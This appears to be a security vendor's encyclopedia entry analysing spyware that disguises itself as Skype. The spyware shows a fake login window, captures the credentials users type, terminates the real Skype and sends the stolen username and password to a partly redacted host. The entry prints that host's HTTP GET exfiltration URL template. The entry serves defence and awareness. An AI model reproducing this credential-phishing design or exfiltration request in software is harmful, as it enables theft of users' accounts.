|
Description:
To get a one-glance comprehensive view of the behavior of this spyware, refer to the Behavior Diagram shown below.
Spyware Overview
This spyware is installed manually by a user.
It disguises itself as Skype, a popular instant messaging and VoIP application, in an attempt to steal user names and passwords for the said program. It even bears the Skype icon to trick users to thinking that it is not a malicious file.
Upon execution, it displays the following message box:
It then displays the following fake Skype login window to trick users into giving out their account credentials:
It also attempts to terminate the legitimate Skype program.
This spyware is capable of monitoring keystrokes when users enter into the user name and password entry fields. Pressing the Enter key triggers a click action on the Sign In button. Once this button is clicked, it proceeds to compare the newly entered password to the previous password used by the user, which can be retrieved from the registry. Counting the number of different passwords entered allows it to display a fake error message indicating that the entered credentials are invalid.
After four login attempts, this spyware terminates itself. It then sends the data it gathers to the IP address XXX.232.{BLOCKED}.42 via HTTP GET. Furthermore, it attempts to execute the legitimate Skype program.
The aforementioned address actually leads to the following site:
http://irkka86.{BLOCKED}.net/index.php?action=post&username=<{different_pass}>{user name}&password={password}&ps=
Where:
- {different_pass} - password count
- {user name} - entered user name of the fake Skype login window
- {password} - entered password of the fake Skype login window
The said routine risks the exposure of the affected user's account information, which may then be used for unauthorized purposes.
|
Save & Share
